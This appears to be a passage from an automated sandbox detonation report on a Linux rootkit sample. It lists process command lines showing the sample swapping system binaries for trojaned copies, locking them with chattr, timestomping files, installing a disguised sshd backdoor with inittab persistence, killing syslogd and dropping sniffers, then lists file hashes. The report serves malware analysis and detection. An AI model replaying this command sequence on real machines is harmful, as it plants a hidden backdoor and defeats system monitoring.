/usr/bin/chattr
[chattr -isa /sbin/ifconfig]
/bin/cp
[cp /sbin/ifconfig /usr/lib/libsh/.backup]
/bin/mv
[mv -f ifconfig /sbin/ifconfig]
/usr/bin/chattr
[chattr +isa /sbin/ifconfig]
/usr/bin/chattr
[chattr -isa /bin/netstat]
/bin/cp
[cp /bin/netstat /usr/lib/libsh/.backup]
/bin/mv
[mv -f netstat /bin/netstat]
/usr/bin/chattr
[chattr +isa /bin/netstat]
/usr/bin/chattr
[chattr -isa /usr/bin/top]
/bin/cp
[cp /usr/bin/top /usr/lib/libsh/.backup]
/bin/mv
[mv -f top /usr/bin/top]
/usr/bin/chattr
[chattr +isa /usr/bin/top]
/usr/bin/chattr
[chattr -isa /bin/ls]
/bin/cp
[cp /bin/ls /usr/lib/libsh/.backup]
/bin/mv
[mv -f ls /bin/ls]
/usr/bin/chattr
[chattr +isa /bin/ls]
/usr/bin/chattr
[chattr -isa /usr/bin/find]
/bin/cp
[cp /usr/bin/find /usr/lib/libsh/.backup]
/bin/mv
[mv -f find /usr/bin/find]
/usr/bin/chattr
[chattr +isa /usr/bin/find]
/usr/bin/chattr
[chattr -isa /usr/bin/pstree]
/bin/cp
[cp /usr/bin/pstree /usr/lib/libsh/.backup]
/bin/mv
[mv -f pstree /usr/bin/pstree]
/usr/bin/chattr
[chattr +isa /usr/bin/pstree]
/usr/bin/chattr
[chattr -isa /usr/bin/md5sum]
/bin/cp
[cp /usr/bin/md5sum /usr/lib/libsh/.backup]
/bin/mv
[mv -f md5sum /usr/bin/md5sum]
/usr/bin/chattr
[chattr +isa /usr/bin/md5sum]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/utilz]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/utilz/*]
/bin/mv
[mv /tmp/utilz /usr/lib/libsh/]
/bin/mkdir
[mkdir /usr/lib/libsh/.sniff]
/bin/mv
[mv /tmp/bin/shsniff /usr/lib/libsh/.sniff/shsniff]
/bin/mv
[mv /tmp/bin/shp /usr/lib/libsh/.sniff/shp]
/bin/mv
[mv /tmp/bin/shsb /usr/lib/libsh/shsb]
/bin/mv
[mv /tmp/bin/hide /usr/lib/libsh/hide]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shsniff]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shp]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/shsb]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/hide]
/bin/chmod
[chmod +x /usr/lib/libsh/.sniff/*]
/bin/chmod
[chmod +x /usr/lib/libsh/shsb]
/bin/chmod
[chmod +x /usr/lib/libsh/hide]
/bin/ps
[ps aux]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep named]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep smbd]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep rpc.statd]
/bin/rm
[rm -rf /tmp/.procs]
/bin/cat
[cat /tmp/.stats]
/bin/grep
[grep 443]
/bin/grep
[grep http]
/bin/rm
[rm -rf /tmp/.stats]
/bin/mkdir
[mkdir /usr/lib/libsh/.owned]
/usr/bin/chattr
[chattr +isa /usr/lib/libsh]
/usr/bin/chattr
[chattr +isa /lib/libsh.so]
/usr/bin/killall
[killall -9 -q nscd]
/usr/bin/killall
[killall -9 -q xntps]
/usr/bin/killall
[killall -9 -q mountd]
/usr/bin/killall
[killall -9 -q mserv]
/usr/bin/killall
[killall -9 -q psybnc]
/usr/bin/killall
[killall -9 -q t0rns]
/usr/bin/killall
[killall -9 -q linsniffer]
/usr/bin/killall
[killall -9 -q sniffer]
/usr/bin/killall
[killall -9 -q lpsched]
/usr/bin/killall
[killall -9 -q sniff]
/usr/bin/killall
[killall -9 -q sn1f]
/usr/bin/killall
[killall -9 -q sshd2]
/usr/bin/killall
[killall -9 -q xsf]
/usr/bin/killall
[killall -9 -q xchk]
/usr/bin/killall
[killall -9 -q ssh2d]
/sbin/ifconfig
[/sbin/ifconfig eth0]
/bin/grep
[grep inet addr:]
/usr/bin/awk
[awk -F {print $2} ]
/usr/bin/cut
[cut -c6-]
/bin/hostname
[hostname -f]
/bin/uname
[uname -a]
/usr/bin/awk
[awk { print $11 }]
/bin/cat
[cat /tmp/info_tmp]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep bogomips]
/usr/bin/awk
[awk {print $3}]
/bin/hostname
[hostname -i]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep eth]
/usr/bin/wc
[wc -l]
/usr/bin/head
[head -1 /etc/debian_version]
/bin/rm
[rm -rf /tmp/info_tmp]
/bin/date
[date +%S]
/usr/bin/expr
[expr 20 - 21]
/sbin/iptables
[/sbin/iptables -L input]
/usr/bin/head
[head -5]
/sbin/syslogd
[/sbin/syslogd -m 0]
/bin/rm
[rm -rf ../shv5*]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
| US | 1.1.1.1:53 | debian9-mipsbe-20240611-en-4 | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-15 23:17
Reported
2024-07-15 23:19
Platform
debian9-mipsel-20240611-en
Max time kernel
39s
Max time network
40s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /usr/sbin/ttyload | /usr/sbin/ttyload | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /bin/hostname | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Enumerates running processes
Write file to user bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /usr/sbin/ttyload | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /bin/cat | N/A |
Reads CPU attributes
| Description | Indicator | Process | Target |
| File opened for reading | /sys/devices/system/cpu/online | /bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/21/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/801/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/20/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/15/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/154/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/73/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/681/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/857/cmdline | /usr/bin/killall | N/A |
| File opened for reading | /proc/713/stat | /bin/ps | N/A |
| File opened for reading | /proc/669/stat | /bin/pidof | N/A |
| File opened for reading | /proc/232/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/79/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/75/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/339/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/74/stat | /bin/pidof | N/A |
| File opened for reading | /proc/857/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/334/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/684/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/22/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/339/stat | /bin/ps | N/A |
| File opened for reading | /proc/331/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/73/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/331/stat | /bin/ps | N/A |
| File opened for reading | /proc/15/stat | /bin/ps | N/A |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/708/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/73/stat | /bin/pidof | N/A |
| File opened for reading | /proc/37/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/435/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/79/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/708/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/72/stat | /bin/pidof | N/A |
| File opened for reading | /proc/383/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/435/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/886/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/684/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/811/stat | /bin/pidof | N/A |
| File opened for reading | /proc/332/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/74/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/7/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/711/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/703/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/177/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/4/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/676/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/21/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/20/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/6/cmdline | /bin/pidof | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/74/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/70/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/37/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/676/stat | /bin/pidof | N/A |
| File opened for reading | /proc/36/stat | /bin/pidof | N/A |
| File opened for reading | /proc/337/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/6/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/12/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/711/cmdline | /bin/ps | N/A |
| File opened for reading | /proc/7/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/71/stat | /usr/bin/killall | N/A |
| File opened for reading | /proc/710/stat | /bin/ps | N/A |
| File opened for reading | /proc/filesystems | /bin/mv | N/A |
| File opened for reading | /proc/2/stat | /bin/ps | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/info_tmp | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/bin/.sh/sshd_config | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/conf/hosts.h | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.init1 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.init2 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.shmd5 | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.procs | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
| File opened for modification | /tmp/.stats | /tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118 | N/A |
Processes
/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118
[/tmp/4bd599176fbaab489642f3fafb083862_JaffaCakes118]
/usr/bin/whoami
[whoami]
/bin/tar
[tar zxf ./bin.tgz]
/bin/tar
[tar zxf ./conf.tgz]
/bin/tar
[tar zxf ./lib.tgz]
/bin/tar
[tar zxf ./utilz.tgz]
/bin/tar
[tar zxf ./sshd.tgz]
/bin/rm
[rm -rf ./sshd.tgz]
/bin/rm
[rm -rf bin.tgz conf.tgz lib.tgz utilz.tgz]
/bin/sleep
[sleep 2]
/usr/bin/killall
[killall -9 syslogd]
/bin/date
[date +%S]
/bin/sleep
[sleep 2]
/bin/hostname
[hostname -f]
/bin/grep
[grep -v ^# /etc/syslog.conf]
/bin/grep
[grep -v ^$]
/bin/grep
[grep @]
/usr/bin/cut
[cut -d @ -f 2]
/bin/uname
[uname -n]
/bin/mv
[mv lib/libproc.a /lib/]
/bin/mv
[mv lib/libproc.so.2.0.6 /lib/]
/sbin/ldconfig
[/sbin/ldconfig]
/usr/bin/md5sum
[md5sum]
/usr/bin/touch
[touch -acmr /bin/ls /etc/sh.conf]
/bin/chown
[chown -f root:root /etc/sh.conf]
/usr/bin/chattr
[chattr +isa /etc/sh.conf]
/bin/rm
[rm -rf /tmp/bin/.sh/shdcf2]
/bin/mv
[mv /tmp/bin/.sh/sshd_config /tmp/bin/.sh/shdcf]
/bin/mv
[mv /tmp/conf/lidps1.so /lib/lidps1.so]
/usr/bin/touch
[touch -acmr /bin/ls /lib/lidps1.so]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/conf/*]
/bin/mv
[mv /tmp/conf/* /usr/include/]
/bin/mkdir
[mkdir /lib/libsh.so]
/usr/bin/touch
[touch -acmr /bin/ls /lib/libsh.so]
/bin/mkdir
[mkdir /usr/lib/libsh]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh]
/bin/mv
[mv .sh/* /lib/libsh.so/]
/bin/mv
[mv .sh/.bashrc /usr/lib/libsh]
/bin/mv
[mv /lib/libsh.so/sshd /sbin/ttyload]
/bin/chmod
[chmod a+xr /sbin/ttyload]
/bin/chmod
[chmod o-w /sbin/ttyload]
/usr/bin/touch
[touch -acmr /bin/ls /sbin/ttyload]
/usr/bin/chattr
[chattr +isa /sbin/ttyload]
/bin/pidof
[pidof ttyload]
/bin/mv
[mv /tmp/bin/ttymon /sbin/ttymon]
/bin/chmod
[chmod a+xr /sbin/ttymon]
/usr/bin/touch
[touch -acmr /bin/ls /sbin/ttymon]
/usr/bin/chattr
[chattr +isa /sbin/ttymon]
/bin/pidof
[pidof ttymon]
/bin/cp
[cp /bin/bash /lib/libsh.so]
/usr/bin/chattr
[chattr -isa /etc/inittab]
/bin/grep
[grep -v ttyload]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep -v getty]
/bin/cat
[cat /etc/inittab]
/bin/grep
[grep getty]
/bin/cat
[cat /tmp/.init2]
/usr/bin/touch
[touch -acmr /bin/ls /usr/sbin/ttyload]
/bin/chmod
[chmod +x /usr/sbin/ttyload]
/usr/bin/chattr
[chattr +isa /usr/sbin/ttyload]
/usr/sbin/ttyload
[/usr/sbin/ttyload]
/sbin/ttyload
[/sbin/ttyload -q]
/sbin/ttymon
[/sbin/ttymon]
/usr/bin/touch
[touch -amcr /etc/inittab /tmp/.init1]
/bin/mv
[mv -f /tmp/.init1 /etc/inittab]
/bin/rm
[rm -rf /tmp/.init2]
/bin/grep
[grep ttyload /etc/inittab]
/usr/bin/md5sum
[/usr/bin/md5sum /bin/ps]
/usr/bin/md5sum
[/usr/bin/md5sum /bin/ls]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/find]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/top]
/usr/bin/md5sum
[/usr/bin/md5sum /usr/bin/md5sum]
/tmp/encrypt
[./encrypt -e .shmd5 /dev/srd0]
/usr/bin/touch
[touch -acmr /bin/ls /dev/srd0]
/usr/bin/chattr
[chattr a+r /dev/srd0]
/bin/chown
[chown -f root:root /dev/srd0]
/bin/rm
[rm -rf .shmd5]
/usr/bin/touch
[touch -acmr /sbin/ifconfig ifconfig]
/usr/bin/touch
[touch -acmr /bin/ps ps]
/usr/bin/touch
[touch -acmr /bin/ls ls]
/usr/bin/touch
[touch -acmr /bin/netstat netstat]
/usr/bin/touch
[touch -acmr /usr/bin/find find]
/usr/bin/touch
[touch -acmr /usr/bin/top top]
/usr/bin/touch
[touch -acmr /usr/sbin/lsof lsof]
/usr/bin/touch
[touch -acmr /sbin/syslogd syslogd]
/usr/bin/touch
[touch -acmr /usr/bin/slocate slocate]
/usr/bin/touch
[touch -acmr /usr/bin/dir dir]
/usr/bin/touch
[touch -acmr /usr/bin/md5sum md5sum]
/usr/bin/touch
[touch -acmr /usr/bin/pstree pstree]
/bin/mkdir
[mkdir /usr/lib/libsh/.backup]
/usr/bin/chattr
[chattr -isa /bin/ps]
/bin/cp
[cp /bin/ps /usr/lib/libsh/.backup]
/bin/mv
[mv -f ps /bin/ps]
/usr/bin/chattr
[chattr +isa /bin/ps]
/usr/bin/chattr
[chattr -isa /sbin/ifconfig]
/bin/cp
[cp /sbin/ifconfig /usr/lib/libsh/.backup]
/bin/mv
[mv -f ifconfig /sbin/ifconfig]
/usr/bin/chattr
[chattr +isa /sbin/ifconfig]
/usr/bin/chattr
[chattr -isa /bin/netstat]
/bin/cp
[cp /bin/netstat /usr/lib/libsh/.backup]
/bin/mv
[mv -f netstat /bin/netstat]
/usr/bin/chattr
[chattr +isa /bin/netstat]
/usr/bin/chattr
[chattr -isa /usr/bin/top]
/bin/cp
[cp /usr/bin/top /usr/lib/libsh/.backup]
/bin/mv
[mv -f top /usr/bin/top]
/usr/bin/chattr
[chattr +isa /usr/bin/top]
/usr/bin/chattr
[chattr -isa /bin/ls]
/bin/cp
[cp /bin/ls /usr/lib/libsh/.backup]
/bin/mv
[mv -f ls /bin/ls]
/usr/bin/chattr
[chattr +isa /bin/ls]
/usr/bin/chattr
[chattr -isa /usr/bin/find]
/bin/cp
[cp /usr/bin/find /usr/lib/libsh/.backup]
/bin/mv
[mv -f find /usr/bin/find]
/usr/bin/chattr
[chattr +isa /usr/bin/find]
/usr/bin/chattr
[chattr -isa /usr/bin/pstree]
/bin/cp
[cp /usr/bin/pstree /usr/lib/libsh/.backup]
/bin/mv
[mv -f pstree /usr/bin/pstree]
/usr/bin/chattr
[chattr +isa /usr/bin/pstree]
/usr/bin/chattr
[chattr -isa /usr/bin/md5sum]
/bin/cp
[cp /usr/bin/md5sum /usr/lib/libsh/.backup]
/bin/mv
[mv -f md5sum /usr/bin/md5sum]
/usr/bin/chattr
[chattr +isa /usr/bin/md5sum]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/utilz]
/usr/bin/touch
[touch -acmr /bin/ls /tmp/utilz/*]
/bin/mv
[mv /tmp/utilz /usr/lib/libsh/]
/bin/mkdir
[mkdir /usr/lib/libsh/.sniff]
/bin/mv
[mv /tmp/bin/shsniff /usr/lib/libsh/.sniff/shsniff]
/bin/mv
[mv /tmp/bin/shp /usr/lib/libsh/.sniff/shp]
/bin/mv
[mv /tmp/bin/shsb /usr/lib/libsh/shsb]
/bin/mv
[mv /tmp/bin/hide /usr/lib/libsh/hide]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shsniff]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/.sniff/shp]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/shsb]
/usr/bin/touch
[touch -acmr /bin/ls /usr/lib/libsh/hide]
/bin/chmod
[chmod +x /usr/lib/libsh/.sniff/*]
/bin/chmod
[chmod +x /usr/lib/libsh/shsb]
/bin/chmod
[chmod +x /usr/lib/libsh/hide]
/bin/ps
[ps aux]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep named]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep smbd]
/bin/cat
[cat /tmp/.procs]
/bin/grep
[grep rpc.statd]
/bin/rm
[rm -rf /tmp/.procs]
/bin/cat
[cat /tmp/.stats]
/bin/grep
[grep 443]
/bin/grep
[grep http]
/bin/rm
[rm -rf /tmp/.stats]
/bin/mkdir
[mkdir /usr/lib/libsh/.owned]
/usr/bin/chattr
[chattr +isa /usr/lib/libsh]
/usr/bin/chattr
[chattr +isa /lib/libsh.so]
/usr/bin/killall
[killall -9 -q nscd]
/usr/bin/killall
[killall -9 -q xntps]
/usr/bin/killall
[killall -9 -q mountd]
/usr/bin/killall
[killall -9 -q mserv]
/usr/bin/killall
[killall -9 -q psybnc]
/usr/bin/killall
[killall -9 -q t0rns]
/usr/bin/killall
[killall -9 -q linsniffer]
/usr/bin/killall
[killall -9 -q sniffer]
/usr/bin/killall
[killall -9 -q lpsched]
/usr/bin/killall
[killall -9 -q sniff]
/usr/bin/killall
[killall -9 -q sn1f]
/usr/bin/killall
[killall -9 -q sshd2]
/usr/bin/killall
[killall -9 -q xsf]
/usr/bin/killall
[killall -9 -q xchk]
/usr/bin/killall
[killall -9 -q ssh2d]
/sbin/ifconfig
[/sbin/ifconfig eth0]
/bin/grep
[grep inet addr:]
/usr/bin/cut
[cut -c6-]
/usr/bin/awk
[awk -F {print $2} ]
/bin/hostname
[hostname -f]
/bin/uname
[uname -a]
/usr/bin/awk
[awk { print $11 }]
/bin/cat
[cat /tmp/info_tmp]
/bin/cat
[cat /proc/cpuinfo]
/bin/grep
[grep bogomips]
/usr/bin/awk
[awk {print $3}]
/bin/hostname
[hostname -i]
/sbin/ifconfig
[/sbin/ifconfig]
/bin/grep
[grep eth]
/usr/bin/wc
[wc -l]
/usr/bin/head
[head -1 /etc/debian_version]
/bin/rm
[rm -rf /tmp/info_tmp]
/bin/date
[date +%S]
/usr/bin/expr
[expr 47 - 15]
/sbin/iptables
[/sbin/iptables -L input]
/usr/bin/head
[head -5]
/sbin/syslogd
[/sbin/syslogd -m 0]
/bin/rm
[rm -rf ../shv5*]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-3 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-3 | udp |
| US | 1.1.1.1:53 | debian9-mipsel-20240611-en-3 | udp |
Files
/var/cache/ldconfig/aux-cache~
| MD5 | 7b968c811ab74e54bd3a6edeaedb7fe4 |
| SHA1 | 84b645300ab3cc1fae00e20d515835cc2f6425c8 |
| SHA256 | 066ddcf734e62e679617b19fd043fb505f7bf1e9dcc99499a1538a23ac046ce9 |
| SHA512 | 3013c678e554ab3bffc6fb1d7705b869c60f3608b45f586b9b6e12a6609e5fd659a0d341a646aefbef0a8e91d6c7d78b8adba24f1a6d6b61c362119201cf76cc |
/etc/sh.conf
| MD5 | 31ef5d48a40eb5163899bd3473a2c9ff |
| SHA1 | 60e30f7942e4da70afc9e4a38b134f0057d72092 |
| SHA256 | 840cb83152de941a3a6d684fea05e24ceca557545341ca8d9794a1408554f552 |
| SHA512 | cd8ad33497eb3dd97bf884cd9d1c228f42b93364831ff945129acdd86b05fa79b09ca48a18c4993f78a3106638aec0e253350b727a535178778e94bd6b58050b |
/lib/libsh.so/bash
| MD5 | ff888a762cf16272e430e01339a82159 |
| SHA1 | 2aa621d5aad40292085f966fb58fd64c92f77781 |
| SHA256 | ee7e16d652d1c6ad490a8c5405a7196cd7081c541e6f81f6ed45e4987acf14ae |
| SHA512 | 421afe6b505c67e0753f0431caa0563dbe8ca29427a36c563226544c9d89dc6c38f6f788bc768854cd1b1ec39e7f08c3842441aa8eed4a865e6bb02197e2b2d0 |
/tmp/.init1
| MD5 | ba6ed6a3d425270d5374b0c2b54b3008 |
| SHA1 | 58635a2e5fa938e55f777cb55a6df5fe44f6b4ec |
| SHA256 | 91c48fb19d87c95033df44d44e58474ab5e2a7176d231c11bb5e45c7d52fa359 |
| SHA512 | 6f2ecc0fe867ec1cc575dc8cbba8566ac32dea4252b355f4267afb18d15dd759baecac3d8b74656a6008b7d20be3033ee4650f8b9cece8c2eb2466dc6fcecd0c |
/tmp/.init1
| MD5 | 0dae4739f83623a59236ecfabe00007b |
| SHA1 | 4b2b361ba9cf76213d2c4d6ba67e80099405f810 |
| SHA256 | 513dfa0b7341549c6141df2ebdf1eedf72f1904d47725a17213b3bcb80916ac0 |
| SHA512 | 12ab203d1434f29cf4b5f81d72a0790d9ddacd20df5d71e2a0d429b2bc8c80cff5c4a4c1332452deb9d84817088a1223f55ef2411f0605cfbe00eb2fe8aa1d74 |
/tmp/.init1
| MD5 | 21df30feebe94d25ce99e861e3642895 |
| SHA1 | 3624439d7e9ac4463f83f1658205367ef27a2234 |
| SHA256 | d3bfdb3e0f63a093f8e9bff6925ddc52429fe09fe4de521add28b373d44fe0f5 |
| SHA512 | 26fbc52d5c2984a74673397e6edce3bf8a14e4d52a1abc7ffdfbf1bae9768b2583512632625d01bac896c623b0ec10fa24f6aa3c54ec2a70450b02d9bb37cecb |
/tmp/.init1
| MD5 | 74e8461d4c9dd715082f15ef51e3ecac |
| SHA1 | 0504be0510ac79c4f7c8d5477032408f9b63a651 |
| SHA256 | 9fff95a586ab017f278fbf2f579d424e29164b5fae02f509176b9a600c4091de |
| SHA512 | 0682c5966466f49b1f53b872e5f10a4264f11a65f198f8e780365e6c683899815f90613cf8cd900d7b8d47247c343ab6002183a405313ac07fe026a2f634e02c |
/tmp/.init1
| MD5 | 8c053b4b674ebfcf6d38503608c5c8db |
| SHA1 | 9927d232e5bb15e3b6bbe461e0041d74649b963a |
| SHA256 | 6bdd745ccb67873f8e05c871ea6f153bb4daa683d7873e22c93fa716f53f61dc |
| SHA512 | 35320ff6eed384649f02262a46bf9fdabdcf1f9808738b7c6af3fea01a1b54c963d038c984c3d794445030632ab1ae38c8d6bbf319a362233a40ac9314a55222 |
/usr/sbin/ttyload
| MD5 | b46702355aecfc0bd14c525655eccb8b |
| SHA1 | 85ae2258fdf63f04130470356e4d0ba13cce49b4 |
| SHA256 | d4fe551995b5a5c5c71656ad1bf102c790f0a8a8415e1331ee9948e451a23db7 |
| SHA512 | db411c4f553c0eefd8672bf395679d48fe7dd9ad467d2ee5e738dd62815b2091c191c32db87bf88ae1aad3689a020c2e565091e1086f5fd1733c75847091f151 |
/usr/sbin/ttyload
| MD5 | 53e75bf7964b0fb15cbe3028a151ed65 |
| SHA1 | 116589e3b65166f73be2c6e8bb3b09c07641a762 |
| SHA256 | 550618b776401129e1bf6000bc28a7891ab0a6431bac3382be1ee1a585282805 |
| SHA512 | ec2f45bc08e02e16db6db32bb71daff158c4044ed7268b696a62bf0efe9de59c331d6afb0b9101b5686e41cc701c491d75b0617c18bb68fb3393bea2ba702316 |
/tmp/.shmd5
| MD5 | eec7232ba4d5ca3a2eb8799c26a874fd |
| SHA1 | c6e9b68130f82ab8b5c5355db53815dbfe10cda6 |
| SHA256 | 1201688781c6ba66a453381af6ea1e639bdea07642772195a76b5c683b001a2c |
| SHA512 | c8e23cac2324fd88dcb841a6175ae8e866c2bc8655aa7acd9db98e92b5a0856d9e026be7a26592d7b3acbed38a9c31b4b067fbe515600dac2ad01e51ea6faebc |
/tmp/.shmd5
| MD5 | 3511cf9f47b8905d2b9a331cd07f15d5 |
| SHA1 | 8024660584a833ed071f4c05cb86b2705fb187b2 |
| SHA256 | 7d7136b0834f12e5ae862511e4f6bdc655ee3f6648386b68bbb7e7fe3e8bfcc4 |
| SHA512 | 7c60426f7b9e0f11fd4bdf767f8194b0d2ea262798cabf7e40d520baabf7ec963c403ec906e165f7fd245786b6830c2079148398fec76d3038eb4555856bf49f |
/tmp/.shmd5
| MD5 | 03ca2cd1e2d14b124a9a88d8124266d9 |
| SHA1 | f1d4faa755b0ac235fe86e530acdb3385604c692 |
| SHA256 | 4b69279b67e2c5667eadb2f675e48f621dafea5e5889a61a6d861977b6b843b3 |
| SHA512 | 8593d08285705ed5b44f0ca81b68fc9b18503a168ccda677cd063544c5939b9c135d3ad3f7eef8296305ecde03029e32b4d6b8ceb6bd85a723230b34704aed70 |
/tmp/.shmd5
| MD5 | 14fe942e9e6a964a58c8078c44be033e |
| SHA1 | 61a772dfd7e9c8638c34e8779bb861b087d28f0f |
| SHA256 | 0a75bd4d0fb7b678d23edf9600fe2afd221d0a4ed7373d134b408cdeb0423c2a |
| SHA512 | 73459874ac59d34b95b43e2a17df819a43c983c752a73b26497d305f1d97c62be6b074e607362e4a8c3df59fa5cc0c8e58103878a8ca292c020663d2d9017cbd |
/tmp/.shmd5
/usr/lib/libsh/.backup/ps
/usr/lib/libsh/.backup/top
/usr/lib/libsh/.backup/ls
/usr/lib/libsh/.backup/find
/usr/lib/libsh/.backup/pstree
/usr/lib/libsh/.backup/md5sum
/tmp/.procs
/tmp/info_tmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-15 23:17
Reported
2024-07-15 23:19
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
4s
Max time network
129s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /usr/sbin/ttyload | /usr/sbin/ttyload | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
